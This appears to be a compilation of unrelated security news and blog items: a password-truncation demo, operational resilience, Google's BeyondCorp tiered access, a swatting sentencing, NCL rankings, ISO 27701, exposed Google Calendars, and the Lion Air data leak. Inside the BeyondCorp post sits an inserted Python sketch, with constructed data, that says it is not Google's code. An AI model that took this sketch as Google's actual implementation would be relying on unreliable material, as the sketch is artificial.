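    generated = "correct-horse-battery-staple-2019"   # as a password manager would store it
    legacy, hardened = {}, {}
    legacy_set_password(legacy, "alice", generated)
    set_password(hardened, "alice", generated)
    return {
        "legacy_full_password_accepted": verify(legacy, "alice", generated),      # False: locked out
        "legacy_prefix_accepted": verify(legacy, "alice", generated[:16]),        # True: only the prefix
        "hardened_full_password_accepted": verify(hardened, "alice", generated),  # True
    }


if __name__ == "__main__":
    print(demo())
```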

Summary

So wrapping it all up in reverse order, arbitrary low limits on length and character composition are bad. They look bad, they lead to negative speculation about security posture and they break tools like password managers.

But would I stop using a bank (as I've seen suggested in the past) solely due to their password policy? No, because authentication in this sector (and the other security controls that often accompany it) go far beyond just string-matching credentials.

Let's keep pushing banks to do better, but not lose our minds about it in the process.

Operational resilience begins with your commitment to and investment in cyber resilience

Operational resilience cannot be achieved without a true commitment to and investment in cyber resilience. Global organizations need to reach a state where their core operations and services will not be disrupted by geopolitical or socioeconomic events, natural disasters, or cyber events.

To help increase stability and lessen the impact to their citizens, an increasing number of government entities have drafted regulations requiring the largest organizations to achieve a true state of operational resilience: where both individual organizations and their industry absorb and adapt to shocks, rather than contributing to them. There are many phenomena that have led to this increased governance, including high-profile cyberattacks like NotPetya, WannaCrypt, and the proliferation of ransomware.

The rise in nation state and cybercrime attacks focusing on critical infrastructure and financial sectors, and the rapid growth of tech innovation pervading more and more industries, join an alarming increase in severe natural disasters, an unstable global geopolitical environment, and global financial market instability on the list of threats organizations should prepare for.

Potential impact of cybercrime attacks

Taken individually, any of these events can cripple critical business and government operations. A lightning strike this summer caused the UK’s National Grid to suffer the biggest blackout in decades. It affected homes across the country, shut down traffic signals, and closed some of the busiest train stations in the middle of the Friday evening rush hour. With trains needing to be manually rebooted, the rhythm of everyday work life was disrupted. The impact of cybercrime attacks can be as significant, and often longer term.

NotPetya cost businesses more than $10 billion; pharmaceutical giant Merck put its bill at $870 million alone. For more than a week, the malware shut down cranes and security gates at Maersk shipping terminals, as well as most of the company’s IT network—from the booking site to systems handling cargo manifests. It took two months to rebuild all the software systems, and three months before all cargo in transit was tracked down—with recovery dependent on a single server having been accidentally offline during the attack due to the power being cut off.

The combination of all these threats will cause disruption to businesses and government services on a scale that hasn’t been seen before. Cyber events will also undermine the ability to respond to other types of events, so they need to be treated holistically as part of planning and response.

Extending operational resiliency to cover your cybersecurity program should not mean applying different principles to attacks, outages, and third-party failures than you would to physical attacks and natural hazards. In all cases, the emphasis is on having plans in place to deliver essential services whatever the cause of the disruption. Organizations are responding by rushing to purchase cyber-insurance policies and increasing their spending on cybersecurity. I encourage them to take a step back and have a critical understanding of what those policies actually cover, and to target the investment, so the approach supports operational resilience.

As we continue to witness an unparalleled increase in cyber-related attacks, we should take note that a large majority of the attacks have many factors in common. At Microsoft, we’ve written at length on the controls that best position an organization to defend against and respond to a cyber event.

We must not stand still

The adversary is innovating and accelerating. We must continue to be vigilant and thorough in both security posture, which must be based on “defense in depth,” and in sophistication of response.

The cost of data breaches continues to rise; the global average cost of a data breach is $3.92 million according to the 2019 Ponemon Institute report. This is up 1.5 percent from 2018 and 12 percent higher than in 2014. These continually rising costs have helped galvanize global entities around the topic of operational resilience.

The Bank of England, in July 2018, published comprehensive guidelines on operational resilience that set a robust standard for rigorous controls across all key areas: technology, legal, communications, financial solvency, business continuity, redundancy, failover, governmental, and customer impact, as well as full understanding of what systems and processes underlie your business products and services.

This paper leaves very few stones unturned and includes a clear statement of my thesis—dealing with cyber risk is an important element of operational resilience and you cannot achieve operational resilience without achieving cyber resilience.

Imagine for a moment that your entire network, including all your backups, is impacted by a cyberattack, and you cannot complete even a single customer banking transaction. That’s only one target; it’s not hard to extrapolate from here to attacks that shut down stock trades, real estate transactions, fund transfers, even to attacks on critical infrastructure like healthcare, energy, water system operators. In the event of a major attack, all these essential services will be unavailable until IT systems are restored to at least a baseline of operations.

It doesn’t require professional cybersecurity expertise to understand the impact of shutting down critical services, which is why the new paradigm for cybersecurity must begin not with regulations but with a program to build cyber resilience. The long list of public, wide-reaching cyberattacks where the companies were compliant with required regulations, but still were breached, demonstrates why we can no longer afford to use regulatory requirements as the ultimate driver of cybersecurity.

While it will always be necessary to be fully compliant with regulations like GDPR, SOX, HIPAA, MAS, regional banking regulators, and any others that might be relevant to your industry, it simply isn’t sufficient for a mature cyber program to use this compliance as the only standard. Organizations must build a program that incorporates defense in depth and implements fundamental security controls like MFA, encryption, network segmentation, patching, and isolation and reduction of exceptions. We also must consider how our operations will continue after a catastrophic cyberattack and build systems that can both withstand attack and be instantaneously resilient even during such an attack. The Bank of England uses the mnemonic WAR: for withstand, absorb, recover.

The ability to do something as simple as restoring from recent backups will be tested in every ransomware attack, and many organizations will fail this test—not because they are not backing up their systems, but because they haven’t tested the quality of their backup procedures or practiced for a cyber event. Training is not enough. Operational resilience guidelines call for demonstrating that you have concrete measures in place to deliver resilient services and that both incident management and contingency plans have been tested. You’ll need to invest in scenario planning, tabletop exercises and red/blue team exercises that prove the rigor of your threat modeling and give practice in recovering from catastrophic cyber events.

Importance of a cyber recovery plan

Imagine, if you will, how negligent it would be for your organization to never plan and prepare for a natural disaster. A cyber event is the equivalent: the same physical, legal, operational, technological, human, and communication standards must apply to preparation, response, and recovery. We should all consider it negligence if we do not have a cyber recovery plan in place. Yet, while the majority of firms have a disaster recovery plan on paper, nearly a quarter never test it, and only 42 percent of global executives are confident their organization could recover from a major cyber event without it affecting their business.

Cybersecurity often focuses on defending against specific threats and vulnerabilities to mitigate cyber risk, but cyber resilience requires a more strategic and holistic view of what could go wrong and how your organization will address it as a whole. The cyber events you’ll face are real threats, and preparing for them must be treated like any other form of continuity and disaster recovery. The challenges to building operational resilience have become more intense in an increasingly hostile cyber environment, and this preparation is a topic we will continue to address.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Operational resilience begins with your commitment to and investment in cyber resilience appeared first on Microsoft Security.

How Google adopted BeyondCorp: Part 3 (tiered access)

Intro

This is the third post in a series of four, in which we set out to revisit various BeyondCorp topics and share lessons that were learnt along the internal implementation path at Google.

The first post in this series focused on providing necessary context for how Google adopted BeyondCorp, Google’s implementation of the zero trust security model. The second post focused on managing devices - how we decide whether or not a device should be trusted and why that distinction is necessary. This post introduces the concept of tiered access, its importance, how we implemented it, and how we addressed associated troubleshooting challenges.

High level architecture for BeyondCorp

What is Tiered Access?

In a traditional client certificate system, certificates are only given to trusted devices. Google used this approach initially as it dramatically simplified device trust. With such a system, any device with a valid certificate can be trusted. At predefined intervals, clients prove they can be trusted and a new certificate is issued. It’s typically a lightweight process and many off-the-shelf products exist to implement flows that adhere to this principle.

However, there are a number of challenges with this setup:
  • Not all devices need the same level of security hardening (e.g. non-standard issue devices, older platforms required for testing, BYOD, etc.).
  • These systems don’t easily allow for nuanced access based on shifting security posture.
  • These systems tend to evaluate a device based on a single set of criteria, regardless of whether devices require access to highly sensitive data (e.g. corporate financials) or far less sensitive data (e.g. a dashboard displayed in a public space).
The next challenge introduced by traditional systems is the inherent requirement that a device must meet your security requirements before it can get a certificate. This sounds reasonable on paper, but it unfortunately means that existing certificate infrastructure can’t be used to aid device provisioning. This implies you must have an additional infrastructure to bootstrap a device into a trusted state.

The most significant challenge is the large amount of time in between trust evaluations. If you only install a new certificate once a year, this means it might take an entire year before you are able to recertify a device. Therefore, any new requirements you wish to add to the fleet may take up to a year before they are fully in effect. On the other hand, if you require certificates to be installed monthly or daily, you have placed a significant burden on your users and/or support staff, as they are forced to go through the certification issuance process far more often, which can be time consuming and frustrating. Additionally, if a device is found to be out of compliance with security policy, the only option is to remove all access by revoking the certificate, rather than degrading access, which can create a frustrating all-or-nothing situation for the user.

Tiered access attempts to address all these challenges, which is why we decided to adopt it. In this new model, certificates are simply used to provide the device’s identity, instead of acting as proof of trust. Trust decisions are then made by a separate system which can be modified without interfering with the certificate issuance process or validity. Moving the trust evaluation out-of-band from the certificate issuance allows us to circumvent the challenges identified above in the traditional system. Below are three ways in which tiered access helps address these concerns.

Different access levels for different security states

By separating trust from identity, we can define infinite levels of trust, if we so desired. At any point in time, we can define a new trust level, or adjust existing trust level requirements, and reevaluate a device's compliance. This is the heart of the tiered access system. It gives us the flexibility to define different device trust criteria for low-sensitivity applications from those used for highly trusted applications.

Solving the bootstrapping challenge

Multiple trust states enable us to use the system to initiate an OS installation. We can now allow access to bootstrapping (configuration and patch management) services based solely on whether we own the device. This enables provisioning to occur from untrusted networks allowing us to replace the traditional IP-based checks.

Configurable frequency of trust evaluations

The frequency of device trust evaluation is independent from certificate issuance in a tiered access setup. This means you can evaluate trust as often as you feel necessary. Changes to trust definitions can be immediately reflected across the entire fleet. Changes to device posture can similarly immediately impact trust.

We should note that the system’s ability to quickly remove trust from devices can be a double edged sword. If there are bugs in the trust definitions or evaluations themselves, this can also quickly remove trust from ‘good’ devices. You must have the ability to adequately test policy changes to mitigate the blast radius from these types of bugs, and ideally canary changes to subsets of the fleet for a baking period. Constant monitoring is also critical. A bug in your trust evaluation system could cause it to start mis-evaluating trust. It’s wise to add alarms if the system starts dropping (or raising) the trust of too many machines at once. The troubleshooting section below provides additional techniques to help minimize the impact of misconfigured trust logic.

How did we define access tiers?

The basic concept of tiers is relatively straightforward: access to data increases as the device security hardening increases. These tiers are useful for coarse grain access control of client devices, which we have found to be sufficient in most cases. At Google, we allow the user to choose the device tier, which lets them weigh access needs against security requirements and policy. If a user needs access to more corporate data, they may have to accept more device configuration restrictions. If a user wants more control over their device and fewer restrictions but doesn't need access to higher risk resources, they can choose a tier with less access to corporate data. For more information about the properties of a trusted platform you can measure, visit our paper about Maintaining a Healthy Fleet.

We knew this model would work in principle, but we didn’t know how many access tiers we should define. As described above, the old model only had two tiers: Trusted and Untrusted. We knew we wanted more than that to enable trust build up at the very least, but we didn’t know the ideal number. More tiers allow access control lists to be specified with greater fidelity at the cost of confusion for service owners, security engineers, and the wider employee base alike.

At Google, we initially supported four distinct tiers ranging from Untrusted to Highly-Privileged Access. The extremes are easy to understand: Untrusted devices should only access data that is already public while Highly-Privileged Access devices have greater privilege internally. The middle two tiers allowed system owners to design their systems with the tiered access model in mind. Certain sensitive actions required a Highly-Privileged Access device while less sensitive portions of the system could be reached with less trusted devices. This degraded access model sounded great to us security wonks. Unfortunately, employees were unable to determine what tier they should choose to ensure they could access all the systems they needed. In the end, we determined that the extra middle tier led to intense confusion without much benefit.

In our current model, the vast majority of devices fit in one of three distinct tiers: Untrusted, Basic Access, and Highly-Privileged Access. In this model, system owners are required to choose the more trusted path if their system is more sensitive. This requirement does limit the finesse of the system but greatly reduces employee confusion and was key to a successful adoption.

In addition to tiers, our system is able to provide additional context to access gateways and underlying applications and services. This additional information is useful to provide finer grained, device-based access control. Imposing additional device restrictions on highly sensitive systems, in addition to checking the coarse grain tier, is a reasonable way to balance security vs user expectations. Because highly sensitive systems are only used by a smaller subset of the employee population, based on role and need, these additional restrictions typically aren’t a source of user confusion. With that in mind, please note that this article only covers device-based controls and does not address fine-grained controls based on a user’s identity.

At the other end of the spectrum, we have OS installation/remediation services. These systems are required in order to support bootstrapping a device which by design does not yet adhere to the Basic Access tier. As described earlier, we use our certificates as a device identity, not trust validation. In the OS installation case, no reported data exists, but we can make access decisions based on the inventory data associated with that device identity. This allows us to ensure our OS and security agents are only installed on devices we own and expect to be in use. Once the OS and security agents are up and running, we can use them to lock down the device and prove it is in a state worthy of more trust.

How did we create rules to implement the tiers?

Device-based data is the heart of BeyondCorp and tiered access. We evaluate trust tiers using data about each device at Google to determine its security integrity and tier level. To obtain this data, we built an inventory pipeline which aggregates data from various sources of authority within our enterprise to obtain a holistic, comprehensive view of a device's security posture. For example, we gather prescribed company asset inventory in one service and observed data reported by agents on the devices in other services. All of this data is used to determine which tier a device belongs in, and trust tiers are reevaluated every time corporate data is changed or new data is reported.

Trust level evaluations are made via "rules", written by security and systems engineers. For example, for a device to have basic access, we have a rule that checks that it is running an approved operating system build and version. For that same device to have highly-privileged access, it would need to pass several additional rules, such as checking the device is encrypted and contains the latest security patches. Rules exist in a hierarchical structure, so several rules can combine to create a tier. Requirements for tiers across device platforms can be different, so there is a separate hierarchy for each. Security engineers work closely with systems engineers to determine the necessary information to protect devices, such as determining thresholds for required minimum version and security patch frequency.

Rule Enforcement and User Experience

To create a good user experience, rules are created and monitored before being enforced. For example, before requiring all users to upgrade their Chrome browser, we monitor how many users will drop trust if that rule was enforced. Dashboards track rule impact on Googlers over 30 day periods. This enables security and systems teams to evaluate rule change impact before they affect end users.

To further protect employee experience, we have measures called grace periods and exceptions. Grace periods provide windows of a predefined duration where devices can violate rules but still maintain trust and access, providing a fallback in case of unexpected consequences. Furthermore, grace periods can be implemented quickly and easily across the fleet for disaster recovery purposes. The other mechanism is called exceptions. Exceptions allow rule authors to create rules for the majority while enabling security engineers to make nuanced decisions around individual riskier processes. For example, if we have a team of Android developers specializing in user experience for an older Android version, they may be granted an exception for the minimum version rule.

How did we simplify troubleshooting?

Troubleshooting access issues proves challenging in a system where many pieces of data interact to create trust. We tackle this issue in two ways. First, we have a system to provide succinct and actionable explanations to end users on how to resolve problems on their own. Second, we have the capability to notify users when their devices have lost trust or are about to lose trust. The combination of these efforts improves the user experience of the tiered access solution and reduces toil for those supporting it.

We are able to provide self-service feedback to users by closely integrating the creation of rule policy with resolution steps for that policy. In other words, security engineers who write rule policies are also responsible for attaching steps on how to resolve the issue. To further aid users, the rule evaluation system provides details about the specific pieces of data causing the failure. All this information is fed into a centralized system that generates user-friendly explanations, guiding users to self-diagnose and fix problems without the need for IT support. Some information must also be withheld: a support tech, for example, may not be able to see pieces of PII about a user when helping fix the device. These cases are rare but necessary to protect the parties involved in these scenarios. Having one centralized debugging system helps deal with all these nuances, enabling us to provide detailed and safe explanations to end users in accordance with their needs.

Remediation steps are communicated to users in several ways. Before a device loses trust, notification pop-ups appear to the user explaining that a loss of access is imminent. These pop-ups contain directions to the remediation system so the user can self-diagnose and fix the problem. This circumvents user pain by offering solutions before the problem impacts the user. Premeditated notifications work in conjunction with the aforementioned grace periods, as we provide a window in which users can fix their devices. If the issue is not fixed and the device goes out of compliance, there is still a clear path on what to do. For example, when a user attempts to access a resource for which they do not have permission, a link appears on the access denied page directing them to the relevant remediation steps. This provides fast, clear feedback on how to fix their device and reduces toil on the IT support teams.
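The rule hierarchy, grace periods and exceptions, the dry-run impact check and the self-service explanations described in the three sections above, as an added Python sketch that is not Google's code. The tier names follow the post; the platform, rule thresholds, dates, device ids and the 10% alarm threshold are constructed for the example.

```python
from dataclasses import dataclass
from datetime import date
from typing import Callable, Optional

# Tiers ordered from least to most trusted (the three-tier model described above).
TIERS = ["Untrusted", "Basic Access", "Highly-Privileged Access"]

@dataclass
class Device:
    device_id: str                 # identity from the client certificate, nothing more
    platform: str
    company_owned: bool            # prescribed asset-inventory data
    os_build: tuple = ()           # observed data reported by the on-device agent
    encrypted: bool = False
    patch_age_days: int = 10_000   # days since the last security patch; huge = unknown
    browser_major: int = 0

@dataclass
class Rule:
    name: str
    check: Callable[[Device], bool]
    remediation: str                       # resolution steps attached by the rule author
    grace_until: Optional[date] = None     # fleet-wide grace period, if any
    exceptions: frozenset = frozenset()    # device ids exempted from this rule

    def passes(self, dev: Device, today: date) -> bool:
        if dev.device_id in self.exceptions:
            return True
        if self.grace_until is not None and today <= self.grace_until:
            return True
        return self.check(dev)

# One rule hierarchy per platform; a tier requires its own rules plus every lower tier's.
# Platform, thresholds, dates and ids are constructed for this example.
RULES = {
    "linux": {
        "Basic Access": [
            Rule("approved_os", lambda d: d.os_build >= (2019, 9),
                 "Upgrade to the 2019.09 corporate build or newer.",
                 exceptions=frozenset({"lap-003"})),   # e.g. a team that must test an old build
            Rule("browser_current", lambda d: d.browser_major >= 77,
                 "Update Chrome to version 77 or newer.",
                 grace_until=date(2019, 10, 15)),       # still rolling out: grace period
        ],
        "Highly-Privileged Access": [
            Rule("disk_encrypted", lambda d: d.encrypted,
                 "Enable full-disk encryption in the device settings."),
            Rule("patched", lambda d: d.patch_age_days <= 30,
                 "Install the pending security patches."),
        ],
    },
}

def evaluate(dev: Device, today: date):
    """Highest tier whose rules all pass, plus the (rule, remediation) pairs blocking the next tier."""
    tier, failures = TIERS[0], []
    for candidate in TIERS[1:]:
        failures = [(r.name, r.remediation)
                    for r in RULES.get(dev.platform, {}).get(candidate, [])
                    if not r.passes(dev, today)]
        if failures:
            break
        tier = candidate
    return tier, failures

def can_bootstrap(dev: Device) -> bool:
    """OS-install/remediation services need no reported data: ownership alone decides."""
    return dev.company_owned

def explain(dev: Device, today: date) -> str:
    """User-facing explanation carrying the rule authors' remediation steps."""
    tier, failures = evaluate(dev, today)
    if not failures:
        return f"{dev.device_id}: {tier}; no action needed."
    steps = "\n".join(f"  - {name}: {fix}" for name, fix in failures)
    return f"{dev.device_id}: {tier}. To regain more access, fix:\n{steps}"

def impact_if_enforced(fleet, rule: Rule, tier: str, today: date) -> int:
    """Dry run of a proposed rule at `tier`: devices now at that tier or above that would fail it."""
    return sum(1 for dev in fleet
               if TIERS.index(evaluate(dev, today)[0]) >= TIERS.index(tier)
               and not rule.check(dev))

def trust_drop_alarm(fleet, rule: Rule, tier: str, today: date, max_fraction=0.1) -> bool:
    """Alarm when enforcing a rule would drop trust on too much of the fleet at once."""
    return impact_if_enforced(fleet, rule, tier, today) > max_fraction * len(fleet)

TODAY = date(2019, 10, 1)
FLEET = [  # constructed sample inventory
    Device("lap-001", "linux", True, (2019, 9), True, 5, 77),
    Device("lap-002", "linux", True, (2019, 9), False, 5, 76),    # browser old, within grace
    Device("lap-003", "linux", True, (2018, 1), False, 400, 70),  # old build, has an exception
    Device("lap-004", "linux", False),                            # unowned, nothing reported
]

if __name__ == "__main__":
    for dev in FLEET:
        print(explain(dev, TODAY), "| bootstrap:", can_bootstrap(dev))
```

Running it prints each device's tier with the remediation steps for the rules it fails; `impact_if_enforced` and `trust_drop_alarm` give the dashboard-style check to run before a new rule goes live.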

Next time

In the next and final post in this series, we will discuss how we migrated services to be protected by the BeyondCorp architecture at Google.

In the meantime, if you want to learn more, you can check out the BeyondCorp research papers. In addition, getting started with BeyondCorp is now easier using zero trust solutions from Google Cloud (context-aware access) and other enterprise providers.

Thank you to the editors of the BeyondCorp blog post series, Puneet Goel (Product Manager), Lior Tishbi (Program Manager), and Justin McWilliams (Engineering Manager).


Man Who Hired Deadly Swatting Gets 15 Months

An Ohio teen who recruited a convicted serial “swatter” to fake a distress call that ended in the police shooting an innocent Kansas man in 2017 has been sentenced to 15 months in prison.

Image: FBI.gov

“Swatting” is a dangerous hoax that involves making false claims to emergency responders about phony hostage situations or bomb threats, with the intention of prompting a heavily-armed police response to the location of the claimed incident.

The tragic swatting hoax that unfolded on the night of Dec. 28, 2017 began with a dispute over a $1.50 wager in an online game “Call of Duty” between Shane M. Gaskill, a 19-year-old Wichita, Kansas resident, and Casey S. Viner, 18, from the Cincinnati, OH area.

Viner wanted to get back at Gaskill in a grudge over the Call of Duty match, and so enlisted the help of another man — Tyler R. Barriss — a serial swatter in California known by the alias “SWAuTistic” who’d bragged of swatting hundreds of schools and dozens of private residences.

Chat transcripts presented by prosecutors showed Viner and Barriss both saying if Gaskill isn’t scared of getting swatted, he should give up his home address. But the address that Gaskill gave Viner to pass on to Barriss no longer belonged to him and was occupied by a new tenant.

Barriss’s fatal call to 911 emergency operators in Wichita was relayed from a local, non-emergency line. Barriss falsely claimed he was at the address provided by Viner, that he’d just shot his father in the head, was holding his mom and sister at gunpoint, and was thinking about burning down the home with everyone inside.

Wichita police quickly responded to the fake hostage report and surrounded the address given by Gaskill. Seconds later, 28-year-old Andrew Finch exited his mom’s home and was killed by a single shot from a Wichita police officer. Finch, a father of two, was no party to the gamers’ dispute and was simply in the wrong place at the wrong time.

“Swatting is not a prank, and it is no way to resolve disputes among gamers,” U.S. Attorney Stephen McAllister, said in a press statement. “Once again, I call upon gamers to self-police their community to ensure that the practice of swatting is ended once and for all.”

In chat records presented by prosecutors, Viner admitted to his role in the deadly swatting attack:

Defendant VINER: I literally said you’re gonna be swatted, and the guy who swatted him can easily say I convinced him or something when I said hey can you swat this guy and then gave him the address and he said yes and then said he’d do it for free because I said he doesn’t think anything will happen
Defendant VINER: How can I not worry when I googled what happens when you’re involved and it said a eu [sic] kid and a US person got 20 years in prison min
Defendant VINER: And he didn’t even give his address he gave a false address apparently
J.D.: You didn’t call the hoax in…
Defendant VINER: Does t [sic] even matter ?????? I was involved I asked him to do it in the first place
Defendant VINER: I gave him the address to do it, but then again so did the other guy he gave him the address to do it as well and said do it pull up etc

Barriss was sentenced earlier this year to 20 years in federal prison for his role in the fatal swatting attack.

Barriss also pleaded guilty to making hoax bomb threats in phone calls to the headquarters of the FBI and the Federal Communications Commission in Washington, D.C. In addition, he made bomb threat and swatting calls from Los Angeles to emergency numbers in Ohio, New Hampshire, Nevada, Massachusetts, Illinois, Utah, Virginia, Texas, Arizona, Missouri, Maine, Pennsylvania, New Mexico, New York, Michigan, Florida and Canada.

Prosecutors for the county that encompasses Wichita decided in April 2018 that the officer who fired the shot that killed Andrew Finch would not face charges, and would not be named because he wasn’t being charged with a crime.

Viner was sentenced after pleading guilty to one count each of conspiracy and obstructing justice, the US attorney’s office for Kansas said. CNN reports that Gaskill has been placed on deferred prosecution.

Viner’s obstruction charge stems from attempts to erase records of his communications with Barriss and the Wichita gamer, McAllister’s office said. In addition to his prison sentence, Viner was ordered to pay $2,500 in restitution and serve two years of supervised release.

Nevada Students Top First Official National Cyber League College Rankings

America's National Cyber League (NCL) has published official college rankings for the very first time, and the University of Nevada has come out on top. 

Cyber-savvy students at the Reno-based university prevailed against 5,026 students from 419 schools across the nation to achieve victory in the NCL's spring 2019 season. This impressive win contributed heavily to Nevada's securing the pole position on the inaugural NCL leaderboard published last week.

In second place was the University of Hawaii at Manoa, followed by California State University at Chico, which took third. Lingering at the bottom of the board in 100th place was Grossmont College, a community college in California.  

The NCL has been challenging high school and college students to demonstrate their cybersecurity skills by taking part in two cybersecurity competitions staged annually since 2011. Entrants step onto a virtual field of competition to solve a series of puzzles based on real-world scenarios. 

Previous challenges included identifying hackers from forensic data, breaking into simulated bank websites, and staging a recovery from a ransomware attack. The University of Nevada's winning team, the Nevada Cyber Club, completed all the challenges set in this year's spring season with 99.26% accuracy. 

Club member and computer science and engineering major Bryson Lingenfelter, speaking after his team's unequivocal victory, said: "I've learned a tremendous amount in three seasons of competing in NCL, and it's a major inspiration for my plans going forward with Cyber Club. NCL is how many of us got started with the club, and I hope to expand our use of competitions as learning tools in the future to engage even more people with cybersecurity." 

Competing in the NCL does more for students than simply give them a chance to vaunt their talent and learn new skills. Thanks to industry-leading cybersecurity skills-evaluation technology from Cyber Skyline, NCL competitors can obtain scouting reports of their performance, which they can use for hiring purposes.

"Cyber competitions like NCL provide a way for cybersecurity students to demonstrate their skills to employers, especially with many entry-level jobs requiring experience," said Franz Payer, CEO of Cyber Skyline.

"The new Cyber Power Rankings highlight the top schools producing new cybersecurity professionals. We're excited for what competitions can do to help address the cyber talent shortage."

ISO 27701 unlocks the path to GDPR compliance and better data privacy

We have good news for those looking for help complying with the GDPR (General Data Protection Regulation): new guidance has been released on how to create effective data privacy controls.

ISO 27701 explains what organisations must do when implementing a PIMS (privacy information management system).

The advice essentially bolts privacy processing controls onto ISO 27001, the international standard for information security, and provides a framework to establish the best practices required by regulations such as the GDPR.

Organisations that are already ISO 27001 compliant will only have a few extra tasks to complete, like a second risk assessment, to account for the new controls. If you’re not familiar with ISO 27001, now is the perfect time to adopt it.

ISO 27701 and ISO 27001: privacy vs security

The main difference between the two standards is that ISO 27701 deals with privacy and the implementation of a PIMS, whereas ISO 27001 addresses information security and an ISMS (information security management system).

These are related concepts – data privacy violations and information security violations are both generally categorised as data breaches. However, they aren’t identical.

  • Information security relates to the way an organisation keeps data accurate, available and accessible only to approved employees.
  • Data privacy relates to the way an organisation collects personal data and prevents unauthorised use or disclosure.

For example, if an organisation collects excessive amounts of information on an individual, that’s a privacy violation. The same is true if an unauthorised employee or cyber criminal gets hold of the data.

When building an information security framework, organisations must take extra steps to ensure that privacy concerns are accounted for alongside security issues.

ISO 27701 addresses this by expanding on the clauses of ISO 27001 and the Annex A controls that relate specifically to data privacy, and by providing two additional sets of controls specific to data controllers and data processors.

It also builds on the principle of information security by directing the reader to the more expansive privacy principles in ISO 29100. These cover a wider range of privacy concerns, including those discussed in data protection regulations internationally.

ISO 27701 and the GDPR

Although it has ‘data protection’ in its name, the GDPR is equally concerned about data privacy.

However, as you will have learned when implementing the Regulation’s requirements, the GDPR doesn’t include guidance on how to do so. This is to prevent it from becoming outdated as best practices evolve and new technologies become available.

That’s all well and good for the long-term, but what are organisations supposed to do right now?

ISO 27701 answers that question, explaining how to ensure data privacy is addressed adequately.

It’s not your only option when it comes to compliance advice, though. ISO 27701’s framework is broad, so that it can help organisations comply with multiple privacy regimes. For example, many organisations might use the Standard to meet the requirements of the CCPA (California Consumer Privacy Act).

By contrast, BS 10012 is a British standard that’s designed to help organisations comply with the GDPR and the DPA (Data Protection Act) 2018.

If your organisation needs to conform only to the GDPR and DPA 2018, you might find BS 10012 a better option.

However, if you’re looking for something more flexible – perhaps you need to assure non-UK stakeholders that you have adequate privacy controls in place – then ISO 27701 is more suitable.

Download our guide to learn more

This article is based on our free green paper ISO 27701 – Privacy information management systems.

The guide is ideal for organisations that want advice on how to strengthen their compliance posture and for those that are familiarising themselves with privacy concerns and the GDPR.

It explains:

  • How ISO 27701 differs from and complements ISO 27001;
  • The structure and requirements of ISO 27701;
  • How ISO 27701 can help you achieve compliance with privacy laws like the GDPR and the DPA 2018; and
  • Which additional requirements will apply if you already have an established ISMS.


The post ISO 27701 unlocks the path to GDPR compliance and better data privacy appeared first on IT Governance Blog.

Experts warn of the exposure of thousands of Google Calendars online

The news is shocking, thousands of Google Calendars are leaking private information posing a severe threat to the privacy of the users.

Thousands of Google Calendars are leaking private information online threatening the privacy of the users.

Google Calendar has more than 1 billion users who could potentially expose their private affairs because of an issue in the implementation of the “invite” feature. It is essential to point out that this isn’t a security vulnerability in Google Calendar, but an issue that could potentially affect anyone who has ever shared their Google Calendar.

You should immediately go back to your Google settings and check whether you are exposing all your events and business activities on the Internet, accessible to anyone.

The security researcher Avinash Jain discovered more than 8000 Google Calendars exposed online and indexed by the Google search engine. This means that anyone could potentially access sensitive data and add new events that could be used to share bogus information or malicious links.

Avinash Jain contacted several media outlets, including Forbes and THN. The Indian expert works for the e-commerce firm Grofers.

“What I found is that — Using a single Google dork (advance search query), I am able to list down all the public google calendar or users who all have set their calendar as public. I found dozens of calendars which are indexed by google’s search engines, revealing or disclosing several sensitive information.” wrote the expert. “I was able to access public calendars of various organizations leaking out sensitive details like their email ids, their event name, event details, location, meeting links, zoom meeting links, google hangout links, internal presentation links and much more,”


Some of the calendars belonged to employees of Alexa top 500 companies and had been made public, whether intentionally or unintentionally.

The issue stems from the public visibility setting that users apply to their Google Calendar. Google does not send any notification warning users about the visibility of their calendar.

“While this is more of an intended setting by the users and intended behavior of the service but the main issue here is that anyone can view anyone public calendar, add anything on it—just by a single search query without being shared the calendar link,” Avinash added.

The issue is not new: over the last few years many experts have warned of the misuse of the “make it public” feature of Google's web-based calendar service, which was introduced 12 years ago.

The expert demonstrated that it is possible to view the exposed Google Calendars by using an advanced Google search query (a Google dork).

“The fix for this: https://support.google.com/a/answer/60765?hl=en. You can set the calendars to only say Free/Busy if anyone wants to make their calendar public. GSuite admin can also create alerts for when Google docs, presentations, and calendars go public.” concludes the researcher.

Pierluigi Paganini

(SecurityAffairs – Google Calendars, privacy)

The post Experts warn of the exposure of thousands of Google Calendars online appeared first on Security Affairs.

All about U.S. tech antitrust investigations | TECH(feed)

Four large tech companies -- Apple, Amazon, Google and Facebook -- are under investigation in the U.S. for allegedly anticompetitive behavior. These antitrust investigations on both the federal and state levels are aimed at uncovering the practices these companies engage in to eliminate competition. In this episode of TECH(feed), Juliet discusses the House investigation into big tech and how Congress plans to investigate potential wrongdoing by these companies.

Backup files for Lion Air and parent airlines exposed and exchanged on forums

Tens of millions of records belonging to passengers of two airline companies owned by Lion Air have been exposed and exchanged on forums.

Data belonging to passengers of two airline companies owned by Lion Air have been exposed and exchanged on forums.

The information was left exposed online in an unsecured Amazon bucket: the records were stored in two databases in a directory containing backup files, mostly for Malindo Air and Thai Lion Air. The most recent backup, dated May 25, is named ‘PaymentGateway.’

The directory was created in May 2019, and the two databases held 21 million and 14 million records respectively. The data appears to have been circulating on exchange forums since August 10.

The directory also included a backup file for Batik Air, which is also owned by Lion Air. Leaked records include passenger and reservation IDs, physical addresses, phone numbers, email addresses, names, dates of birth, passport numbers, and passport expiration dates.

The news of the data leak was first disclosed by BleepingComputer, which reported that the researcher Under the Breach had published samples of the leaked records.

“BleepingComputer could not find an announcement from Lion Air or its subsidiary airlines about a data exposure incident.” reads the post published by BleepingComputer.

Experts noticed that the data was offered on a data exchange community on August 12; it was later secured.

Pierluigi Paganini

(SecurityAffairs – hacking, data leak)

The post Backup files for Lion Air and parent airlines exposed and exchanged on forums appeared first on Security Affairs.

The healthcare industry’s largest cyber challenges


A 2018 national audit of healthcare preparedness observed that only 45 percent of businesses followed the NIST Cybersecurity Framework, a policy framework for cybersecurity guidance for private sector organizations in the United States.

No wonder, then, that the healthcare sector suffers a tremendous number of cyberattacks year after year. A recent example is the theft of the personal information of 14,591 patients who received medical care through Los Angeles County’s hospitals and clinics. Moreover, experts now say that cyberattacks are costing the global healthcare industry billions.

